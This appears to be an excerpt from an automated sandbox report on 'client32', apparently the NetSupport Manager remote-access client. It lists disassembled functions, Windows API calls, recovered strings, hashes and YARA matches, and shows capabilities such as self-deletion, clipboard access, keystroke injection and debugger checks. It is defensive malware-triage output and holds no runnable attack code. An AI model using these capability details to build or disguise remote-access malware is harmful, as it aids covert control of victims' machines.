                                                                                                                                                                                                    • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                                                                                                                    • API String ID: 2050226656-800295887
                                                                                                                                                                                                    • Opcode ID: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction ID: f5da5898e03af7335dd3b432591c065ee650f23ce63a0b1c8c4037c06c323e7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B186B5A44329AFE720DF54CC85FDAF7B8EB48704F108199E619A72C0DB70AA44CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CapiHangup.PCICAPI ref: 1106F48F
                                                                                                                                                                                                    • CapiClose.PCICAPI ref: 1106F494
                                                                                                                                                                                                    • CapiOpen.PCICAPI(00000000,00000000), ref: 1106F49D
                                                                                                                                                                                                    • CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106F4AB
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F53A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F542
                                                                                                                                                                                                    • CapiHangup.PCICAPI ref: 1106F5CF
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106F5F9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F5FF
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1106F645
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Capi$CountTick$HangupSleep$CloseListenOpen
                                                                                                                                                                                                    • String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
                                                                                                                                                                                                    • API String ID: 1585182496-2734021829
                                                                                                                                                                                                    • Opcode ID: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
                                                                                                                                                                                                    • Instruction ID: 1aecc925b5fbc5169191dead02c85a6a785123c90751e1c82bbc8ebf3e53e7af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C1F775F0022A8BE710DF64DC91B9DB7A8AF44318F5081B9E55D9B2C1DE71AE80CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                    • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                                                                                                    • API String ID: 1889721586-3267302290
                                                                                                                                                                                                    • Opcode ID: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
                                                                                                                                                                                                    • Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 11025347
                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 110253B3
                                                                                                                                                                                                    • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 1102541A
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3085788722-363603473
                                                                                                                                                                                                    • Opcode ID: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
                                                                                                                                                                                                    • Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 1108B323
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B32F
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B336
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 1108B34A
                                                                                                                                                                                                    • IsValidSid.ADVAPI32(?), ref: 1108B377
                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 1108B388
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 1108B393
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B39A
                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 1108B3B4
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1108B3CC
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B3D3
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1108B3E6
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B3ED
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeInformationToken$CopyLengthValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3743738291-0
                                                                                                                                                                                                    • Opcode ID: d3a2ad14d567a86b3a5c967b11ade788d4e6e56e00f91bcbf2a518966f882515
                                                                                                                                                                                                    • Instruction ID: 2cc4b386b60098d1c35d7a3f140f102fc95985083371501cdc94239c6e30dc2e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3a2ad14d567a86b3a5c967b11ade788d4e6e56e00f91bcbf2a518966f882515
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB3136B5A04616ABE711DFA9C8C8A6FBBACFF48755F008469FE15C7244DAB0D900CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                                                                                                    • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                                                                                    • API String ID: 1777853711-3305400014
                                                                                                                                                                                                    • Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                                                                                    • Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetPropA.USER32(?,?,?), ref: 1105B43A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetPropA.USER32(?), ref: 1105B44F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105B481
                                                                                                                                                                                                    • RemovePropA.USER32(?,00000000), ref: 1105B4BF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$wsprintf$ErrorExitLastMessageProcessRemove
                                                                                                                                                                                                    • String ID: CltReplay.cpp$NSMClientReplayWin::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                                    • API String ID: 3799649539-2799116179
                                                                                                                                                                                                    • Opcode ID: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
                                                                                                                                                                                                    • Instruction ID: 878e0ad0ae89c655833a3453bcd56fdaae4dff5bf5d24e0f2c31a814972bd83f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFC19875F0152D9BDB94CAA5DC90F7FB7AAEB84314F0041DAE90A97280DA35AD41CF70
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$CreateDialogIndirectParam$ErrorFindLastLoadLockwsprintf
                                                                                                                                                                                                    • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                                                                                                                    • API String ID: 819444633-1552251038
                                                                                                                                                                                                    • Opcode ID: a72b9a5f7e756432c0518510a409f76593e1c895621e800cc3909e4c9bf393a0
                                                                                                                                                                                                    • Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72b9a5f7e756432c0518510a409f76593e1c895621e800cc3909e4c9bf393a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 1101F387
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 1101F3A0
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 1101F3B8
                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1101F3CC
                                                                                                                                                                                                    • MessageBeep.USER32(00000030), ref: 1101F3D4
                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 1101F3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2291271916-0
                                                                                                                                                                                                    • Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 11157677
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 11157687
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 11157691
                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 111576D0
                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 111576DB
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 111576E8
                                                                                                                                                                                                    • BringWindowToTop.USER32(00000000), ref: 111576EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$BringIconicShow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2588442158-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 689D8BA8
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 689D8BBD
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(689F427C), ref: 689D8BC8
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 689D8BE4
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 689D8BEB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 689DFB39
                                                                                                                                                                                                      • Part of subcall function 689DD3F5: Sleep.KERNEL32(00000000,689D6F16,00000001,00000214), ref: 689DD41D
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 689DFC16
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 689DFC36
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 689DFC72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLastSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1708069870-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LocalRectTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2644259849-0
                                                                                                                                                                                                    • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 1110F462
                                                                                                                                                                                                    • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 1110F495
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlDevicekeybd_event
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1421710848-0
                                                                                                                                                                                                    • Opcode ID: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
                                                                                                                                                                                                    • Instruction ID: e6d7b6f79d867a431c183ac05059020376f9649e5a26ee949abc8e508daa714a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32014C72F017127AF30185699D46FE7FA1CEB81720F028238FE59E71C0DA605D05C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlDevice
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2352790924-0
                                                                                                                                                                                                    • Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102B5F5
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileNameTempwsprintf
                                                                                                                                                                                                    • String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$141700$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : Attempt to rename %s to %s$ReplaceLicFile : File checksum matches new checksum so don't write file but load$ReplaceLicFile : License error %d reading %s$ReplaceLicFile : Load new license file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : Revert to previous license$ReplaceLicFile : Status after config test %d - lic error %d$ReplaceLicFile : Status after renames %d - error %d$ReplaceLicFile : Written file %s, read into temporary config$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
                                                                                                                                                                                                    • API String ID: 2029944419-4068609801
                                                                                                                                                                                                    • Opcode ID: f70fa031849871356d7d381289b355860a7e4332ff62328408755086c15e345e
                                                                                                                                                                                                    • Instruction ID: 3f7d5152d730d53d09c226c0233c709ff6bb61f284797e681b654b5f7b742470
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f70fa031849871356d7d381289b355860a7e4332ff62328408755086c15e345e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C020575E0062A6BDB20DBA4CC40FEEF379AF84708F5441D5E91967181EB716A84CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1107B404
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1107B450
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 1107B457
                                                                                                                                                                                                    • GetTextExtentPointA.GDI32(?,?,00000000,?), ref: 1107B4AA
                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 1107B4E3
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1107B4F4
                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 1107B4FB
                                                                                                                                                                                                    • SetRect.USER32(?,00000001,?,?,?), ref: 1107B532
                                                                                                                                                                                                    • SetRect.USER32(?,00000004,?,?,?), ref: 1107B592
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B5FF
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B629
                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 1107B632
                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000043), ref: 1107B67F
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B702
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B710
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B72B
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000002,00000000), ref: 1107B739
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B754
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FE,00000002), ref: 1107B762
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B77D
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000002,00000000), ref: 1107B78B
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B7A6
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B7B4
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B7C5
                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000043), ref: 1107B7E1
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B7F6
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B80B
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B81F
